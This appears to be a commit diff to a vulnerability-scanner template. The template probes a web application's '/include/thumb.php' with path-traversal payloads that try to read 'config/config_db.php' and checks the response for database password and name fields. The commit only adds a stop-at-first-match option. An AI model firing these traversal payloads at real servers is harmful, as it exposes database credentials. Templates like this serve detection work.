commit
d9a8a299d3
|
@ -13,14 +13,17 @@ requests:
|
||||||
- '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
|
- '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
|
||||||
- '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'
|
- '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "con_db_pass"
|
- "con_db_pass"
|
||||||
- "con_db_name"
|
- "con_db_name"
|
||||||
part: body
|
part: body
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
Loading…
Reference in New Issue